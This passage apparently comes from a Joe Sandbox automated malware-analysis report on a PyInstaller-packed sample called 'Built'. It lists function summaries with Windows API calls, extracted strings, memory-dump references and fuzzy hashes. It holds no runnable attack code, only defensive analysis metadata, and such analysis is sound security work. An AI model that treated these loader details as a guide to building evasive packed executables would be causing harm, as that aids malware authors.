__scrt_dllmain_after_initialize_c.LIBCMT ref: 00007FFDF70327FE
__scrt_release_startup_lock.LIBCMT ref: 00007FFDF7032829

Memory Dump Source

Source File: 00000003.00000002.2060889895.00007FFDF7031000.00000040.00000001.01000000.0000001E.sdmp, Offset: 00007FFDF7030000, based on PE: true

Associated: 00000003.00000002.2060849267.00007FFDF7030000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000003.00000002.2060889895.00007FFDF7092000.00000040.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000003.00000002.2060889895.00007FFDF70DE000.00000040.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000003.00000002.2060889895.00007FFDF70E1000.00000040.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000003.00000002.2060889895.00007FFDF70E6000.00000040.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000003.00000002.2060889895.00007FFDF7140000.00000040.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000003.00000002.2060889895.00007FFDF7143000.00000040.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000003.00000002.2060889895.00007FFDF7145000.00000040.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000003.00000002.2060889895.00007FFDF7148000.00000040.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000003.00000002.2061824511.00007FFDF7149000.00000080.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000003.00000002.2061898819.00007FFDF714B000.00000004.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffdf7030000_Built.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
String ID:
API String ID: 349153199-0
Opcode ID: 5ae4ae1fad975d5487a8dd9099fd26104a61e4c8513e68d9fc499fd676c40ec1
Instruction ID: f921ac35fecb85df2f33a8c88f6ea30845b8ea9558e8b40fcb00dbd922b559d9
Opcode Fuzzy Hash: 5ae4ae1fad975d5487a8dd9099fd26104a61e4c8513e68d9fc499fd676c40ec1
Instruction Fuzzy Hash: CC819E2DF0864386F7F09B659461AF962B0AF46780F548439DA6CC73DEDE3CE9C5A600

Function 00007FFE1024284C Relevance: 16.7, APIs: 11, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FFE10242874
__scrt_initialize_crt.LIBCMT ref: 00007FFE102428B9
__scrt_acquire_startup_lock.LIBCMT ref: 00007FFE102428C6
_RTC_Initialize.LIBCMT ref: 00007FFE102428F4
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00007FFE1024291A
__scrt_release_startup_lock.LIBCMT ref: 00007FFE10242945

Memory Dump Source

Source File: 00000003.00000002.2067833752.00007FFE10241000.00000040.00000001.01000000.00000019.sdmp, Offset: 00007FFE10240000, based on PE: true

Associated: 00000003.00000002.2067786315.00007FFE10240000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000003.00000002.2067833752.00007FFE1025E000.00000040.00000001.01000000.00000019.sdmpDownload File
Associated: 00000003.00000002.2067833752.00007FFE10268000.00000040.00000001.01000000.00000019.sdmpDownload File
Associated: 00000003.00000002.2068013590.00007FFE1026B000.00000080.00000001.01000000.00000019.sdmpDownload File
Associated: 00000003.00000002.2068045178.00007FFE1026D000.00000004.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffe10240000_Built.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
String ID:
API String ID: 349153199-0
Opcode ID: 3deb18bcaf08424228fc9faf223167da3c092cad5365cc421c38a22d5af63d85
Instruction ID: 690598a615ba7e18ce1dd3a3596537a7759d078549fc4927766240b5dc4e98e7
Opcode Fuzzy Hash: 3deb18bcaf08424228fc9faf223167da3c092cad5365cc421c38a22d5af63d85
Instruction Fuzzy Hash: 92818A21E18E43C6FA54AB6794812796E90AFC67B4F9440B5DF4CC77B7DE2CE849C600

Function 00007FF76D5C7FC0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 89processsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF76D5C86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF76D5C3FA4,00000000,00007FF76D5C1925), ref: 00007FF76D5C86E9

SetConsoleCtrlHandler.KERNEL32(?,00007FF76D5C39C0), ref: 00007FF76D5C800A
GetStartupInfoW.KERNEL32(?,00007FF76D5C39C0), ref: 00007FF76D5C802B

Part of subcall function 00007FF76D5D978C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5D97A0

Part of subcall function 00007FF76D5D7A2C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5D7A93

GetCommandLineW.KERNEL32(?,00007FF76D5C39C0), ref: 00007FF76D5C80CD
CreateProcessW.KERNEL32(?,00007FF76D5C39C0), ref: 00007FF76D5C810F
WaitForSingleObject.KERNEL32(?,00007FF76D5C39C0), ref: 00007FF76D5C8123
GetExitCodeProcess.KERNEL32(?,00007FF76D5C39C0), ref: 00007FF76D5C8133

Strings

CreateProcessW, xrefs: 00007FF76D5C8146
[oV116, xrefs: 00007FF76D5C7FD3
Failed to create child process!, xrefs: 00007FF76D5C813F

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
String ID: CreateProcessW$Failed to create child process!$[oV116
API String ID: 2895956056-3201491172
Opcode ID: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
Instruction ID: 5c95ef3233acb4006b4c4665c0adfba61d3624a43145cedb2713642687650bb7
Opcode Fuzzy Hash: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
Instruction Fuzzy Hash: 7B410431A1C781C1DB20BB24F4552AAB3A1FB89364F900335E9AD47BD6EF7CD0458B60

Function 00007FF76D5D55A0 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5D55E3
_invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5D59D0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5D5C6C

Strings

p, xrefs: 00007FF76D5D570D
-, xrefs: 00007FF76D5D5679
p, xrefs: 00007FF76D5D5695
:, xrefs: 00007FF76D5D579C
f, xrefs: 00007FF76D5D5705

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: -$:$f$p$p
API String ID: 3215553584-2013873522
Opcode ID: 6485ef080591767760fe67f9caec812fff4e1ba5c20858478bd9f0fbec74de2f
Instruction ID: 3fb5e0500e17e72d1a32e5009aaa274686dde0c153129dd0a3a2b86acb615497
Opcode Fuzzy Hash: 6485ef080591767760fe67f9caec812fff4e1ba5c20858478bd9f0fbec74de2f
Instruction Fuzzy Hash: D4128461A2C243C6FB20BB15D064279E661FB52750FD44135DAAA46EC6FF3CE590CB38

Function 00007FF76D5D02E8 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5D0328
_invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5D06F0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5D098F

Strings

f, xrefs: 00007FF76D5D0575
f, xrefs: 00007FF76D5D042A
p, xrefs: 00007FF76D5D03CD
f, xrefs: 00007FF76D5D03C0
p, xrefs: 00007FF76D5D0432

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$f$p$p$f
API String ID: 3215553584-1325933183
Opcode ID: 47a7a6303f50c331757a7ed503f6ccc132970c05c2223996d06c8e5714df85c4
Instruction ID: 1b85cf809e91196545d0148d97ab6021bb633926a2feb0ae865539252f420907
Opcode Fuzzy Hash: 47a7a6303f50c331757a7ed503f6ccc132970c05c2223996d06c8e5714df85c4
Instruction Fuzzy Hash: 06128361E2C143C6FB20BA1AE0646B9E251FB80754FD44033DAA947DC6EF7DE4809B79

Function 00007FF76D5CDD28 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF76D5CDD85

Part of subcall function 00007FF76D5CECDC: __GetUnwindTryBlock.LIBCMT ref: 00007FF76D5CED1F
Part of subcall function 00007FF76D5CECDC: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF76D5CED44

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF76D5CDE5D
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF76D5CE0AB
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF76D5CE1B8

Strings

csm, xrefs: 00007FF76D5CDE06
csm, xrefs: 00007FF76D5CDD9F
[oV116, xrefs: 00007FF76D5CDD41
csm, xrefs: 00007FF76D5CDE80

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: [oV116$csm$csm$csm
API String ID: 849930591-2412342726
Opcode ID: e61afc8d21ba52cdbe611d77afa9c967b031d652e012678c684f0478f5a183c7
Instruction ID: e0d039ff91a23e5512b84333114877244d3d57b5b4fedc486f6a8249595b7d54
Opcode Fuzzy Hash: e61afc8d21ba52cdbe611d77afa9c967b031d652e012678c684f0478f5a183c7
Instruction Fuzzy Hash: BED16032A2C741C6EB20AB6594413ADB7A0FB55798F500139EE4D97F96EF38E091CB60

Function 00007FF76D5DE020 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 117libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,00007FF76D5DE3BA,?,?,000001D5E2D86C68,00007FF76D5DA063,?,?,?,00007FF76D5D9F5A,?,?,?,00007FF76D5D524E), ref: 00007FF76D5DE19C
GetProcAddress.KERNEL32(?,?,?,00007FF76D5DE3BA,?,?,000001D5E2D86C68,00007FF76D5DA063,?,?,?,00007FF76D5D9F5A,?,?,?,00007FF76D5D524E), ref: 00007FF76D5DE1A8

Strings

api-ms-, xrefs: 00007FF76D5DE0E6
[oV116, xrefs: 00007FF76D5DE05C, 00007FF76D5DE141, 00007FF76D5DE1B3
ext-ms-, xrefs: 00007FF76D5DE0F9

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: [oV116$api-ms-$ext-ms-
API String ID: 3013587201-3775442462
Opcode ID: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
Instruction ID: f2893d0b71bf94a64afa05ebb4aa7950cd02e9e61dca5ef5c7578f6153641722
Opcode Fuzzy Hash: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
Instruction Fuzzy Hash: DC41C331B2D602C1FA16FB16A8106B5E292BF45BA0F894135DD6D97B86FE3CE405C234

Function 00007FF76D5C7C40 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 116COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(?,?,FFFFFFFF,00007FF76D5C3834), ref: 00007FF76D5C7CE4
CreateDirectoryW.KERNEL32(?,?,FFFFFFFF,00007FF76D5C3834), ref: 00007FF76D5C7D2C

Part of subcall function 00007FF76D5C7E10: GetEnvironmentVariableW.KERNEL32(00007FF76D5C365F), ref: 00007FF76D5C7E47
Part of subcall function 00007FF76D5C7E10: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF76D5C7E69

Part of subcall function 00007FF76D5D7548: _invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5D7561

Part of subcall function 00007FF76D5C26C0: MessageBoxW.USER32 ref: 00007FF76D5C2736

Strings

TMP, xrefs: 00007FF76D5C7C7C, 00007FF76D5C7D83
LOADER: failed to set the TMP environment variable., xrefs: 00007FF76D5C7CBC
[oV116, xrefs: 00007FF76D5C7C5B
_MEI%d, xrefs: 00007FF76D5C7CF2
LOADER: length of teporary directory path exceeds maximum path length!, xrefs: 00007FF76D5C7D5E
TMP, xrefs: 00007FF76D5C7CA2

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: Environment$CreateDirectoryExpandMessagePathStringsTempVariable_invalid_parameter_noinfo
String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$[oV116$_MEI%d
API String ID: 740614611-488076301
Opcode ID: 9cba264b996c54071923a246639d1af5409d9d1b2208d63368212f3f3054f6c1
Instruction ID: 7c0004b7c7c841ee3bd77a572f202ef4d75feee4cc4491f1e2f6653cabc14b15
Opcode Fuzzy Hash: 9cba264b996c54071923a246639d1af5409d9d1b2208d63368212f3f3054f6c1
Instruction Fuzzy Hash: 7C418011E2D642C1EA20BB6199652F99261AF997C0FC41036ED2D47F97FE3CE5058B70

Function 00007FF76D5C1050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 111COMMON

Download Yara Rule

Strings

fread, xrefs: 00007FF76D5C11D7
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF76D5C10C5
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF76D5C10F5
malloc, xrefs: 00007FF76D5C10FC
Failed to extract %s: failed to open archive file!, xrefs: 00007FF76D5C1097
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF76D5C11D0
fseek, xrefs: 00007FF76D5C10CC

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: Message
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2030045667-3659356012
Opcode ID: 0271c9e8a591b78ab9b321a6b40da885492933660b8e0e1c956a9867e3bf8942
Instruction ID: 26a90a7a21aa1f065b8da1727ee743bf6e986799b3433e0c9bd60d09c9e32b59
Opcode Fuzzy Hash: 0271c9e8a591b78ab9b321a6b40da885492933660b8e0e1c956a9867e3bf8942
Instruction Fuzzy Hash: 14415C21B2C642C2EA20BB12E8409B6E2A1BB44BC4F844035DD5D47F97FE3CE4458B70

Function 00007FF76D5DA460 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF76D5DA46F
FlsGetValue.KERNEL32 ref: 00007FF76D5DA484
FlsSetValue.KERNEL32 ref: 00007FF76D5DA4A5
FlsSetValue.KERNEL32 ref: 00007FF76D5DA4D2
FlsSetValue.KERNEL32 ref: 00007FF76D5DA4E3
FlsSetValue.KERNEL32 ref: 00007FF76D5DA4F4
SetLastError.KERNEL32 ref: 00007FF76D5DA50F

Strings

[oV116, xrefs: 00007FF76D5DA46A

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: Value$ErrorLast
String ID: [oV116
API String ID: 2506987500-247592185
Opcode ID: b7fe2b7561df6cd4c7c1d854bd8c4ee8707a2c1e4b543b2cdc9668ec51387f6f
Instruction ID: cd5f792b410c71dcf3c5fdcf970c33abae0a6236f8d723b2d8bc63fc76eabc0f
Opcode Fuzzy Hash: b7fe2b7561df6cd4c7c1d854bd8c4ee8707a2c1e4b543b2cdc9668ec51387f6f
Instruction Fuzzy Hash: 5A216D21A2C642C2FA64B325566597AE1425F587B0FD40634EC3E47EDBFE2CB4404738

Function 00007FF76D5C81F0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,00000000,?,00007FF76D5C39F2), ref: 00007FF76D5C821D
K32EnumProcessModules.KERNEL32(?,00000000,?,00007FF76D5C39F2), ref: 00007FF76D5C827A

Part of subcall function 00007FF76D5C86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF76D5C3FA4,00000000,00007FF76D5C1925), ref: 00007FF76D5C86E9

K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF76D5C39F2), ref: 00007FF76D5C8305
K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF76D5C39F2), ref: 00007FF76D5C8364
FreeLibrary.KERNEL32(?,00000000,?,00007FF76D5C39F2), ref: 00007FF76D5C8375
FreeLibrary.KERNEL32(?,00000000,?,00007FF76D5C39F2), ref: 00007FF76D5C838A

Strings

[oV116, xrefs: 00007FF76D5C8202

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
String ID: [oV116
API String ID: 3462794448-247592185
Opcode ID: a6a3fb36dedf01dc407d01068d21ba79f730b9d247533213ec4f70efe0ab8627
Instruction ID: 3a52251cca8e3cb8f25608df04fce95e339491af82c9d27b9614f2b945e6b2aa
Opcode Fuzzy Hash: a6a3fb36dedf01dc407d01068d21ba79f730b9d247533213ec4f70efe0ab8627
Instruction Fuzzy Hash: 01418462A2D682C1EB30BB11A9002BAB794FF45BC4F845139DF5D57B86EE3CD501CB60

Function 00007FF76D5C29E0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 58windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF76D5C342E,?,00007FF76D5C3534), ref: 00007FF76D5C2A14
FormatMessageW.KERNEL32(?,?,?,00007FF76D5C342E), ref: 00007FF76D5C2A7D
MessageBoxW.USER32(?,?,?,00007FF76D5C342E), ref: 00007FF76D5C2ACF

Strings

Error, xrefs: 00007FF76D5C2ABE
<FormatMessageW failed.>, xrefs: 00007FF76D5C2A83
%ls%ls: %ls, xrefs: 00007FF76D5C2A96
[oV116, xrefs: 00007FF76D5C29FF

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: Message$ErrorFormatLast
String ID: %ls%ls: %ls$<FormatMessageW failed.>$Error$[oV116
API String ID: 3971115935-1929273706
Opcode ID: 7223b30dd23a30c2aa7faf0092ff60e4697deebee1b944f1837b883079aee3ab
Instruction ID: dc1cf27e58306d8152ba49d9e342c357a3e727a90219720369369e1d754be31e
Opcode Fuzzy Hash: 7223b30dd23a30c2aa7faf0092ff60e4697deebee1b944f1837b883079aee3ab
Instruction Fuzzy Hash: 5321FF7262CB86C2E720BB10F4516DAB365FB88785F800136EE8D53E99EF7CD5468B50

Function 00007FF76D5E29B0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 182COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5E2A94

Strings

[oV116, xrefs: 00007FF76D5E2AA9
[oV116, xrefs: 00007FF76D5E2AE5, 00007FF76D5E2B80
[oV116, xrefs: 00007FF76D5E2ABB
[oV116, xrefs: 00007FF76D5E2AB2
[oV116, xrefs: 00007FF76D5E2AC4

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: [oV116$[oV116$[oV116$[oV116$[oV116
API String ID: 3215553584-4059291977
Opcode ID: bbe49b361f6b02a2f9750cfc56697fc2c071dae7ca02d99c21af6610391908d0
Instruction ID: 45c5d02c14a3be5487aee26aa80a439cb3c8c56b86c346533766f8fa836634b5
Opcode Fuzzy Hash: bbe49b361f6b02a2f9750cfc56697fc2c071dae7ca02d99c21af6610391908d0
Instruction Fuzzy Hash: 6861B022D2C243D6F678BB25955427EE695EF98780FD84435CD0E02EAAFE7CE8408230

Function 00007FF76D5CCFE8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF76D5CD29A,?,?,?,00007FF76D5CCF8C,?,?,?,00007FF76D5CCB89), ref: 00007FF76D5CD06D
GetLastError.KERNEL32(?,?,?,00007FF76D5CD29A,?,?,?,00007FF76D5CCF8C,?,?,?,00007FF76D5CCB89), ref: 00007FF76D5CD07B
LoadLibraryExW.KERNEL32(?,?,?,00007FF76D5CD29A,?,?,?,00007FF76D5CCF8C,?,?,?,00007FF76D5CCB89), ref: 00007FF76D5CD0A5
FreeLibrary.KERNEL32(?,?,?,00007FF76D5CD29A,?,?,?,00007FF76D5CCF8C,?,?,?,00007FF76D5CCB89), ref: 00007FF76D5CD113
GetProcAddress.KERNEL32(?,?,?,00007FF76D5CD29A,?,?,?,00007FF76D5CCF8C,?,?,?,00007FF76D5CCB89), ref: 00007FF76D5CD11F

Strings

api-ms-, xrefs: 00007FF76D5CD08D

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
